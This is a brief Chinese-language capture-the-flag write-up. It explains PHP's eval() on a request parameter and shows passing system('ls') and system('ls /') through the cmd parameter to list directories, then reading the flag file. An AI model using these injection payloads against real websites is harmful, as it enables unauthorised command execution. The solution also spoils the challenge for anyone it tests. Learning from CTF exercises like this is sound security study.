首先进入题目
我们先了解一下php当中eval()函数的作用
eval()函数中的eval是evaluate的简称,这个函数的作用就是把一段字符串当作PHP语句来执行。
比如说eval($_REQUEST["cmd"])
$_REQUEST[]是接收数据用的,而其中的cmd 就是其中的数据
进入题目
cmd是其中的参数,我们就把命令赋给cmd,我们先显示一下网页的根目录
?cmd=system("ls ");
接着我们看上一级目录
?cmd=system("ls /");
发现flag_28679
我们cat它
拿到flag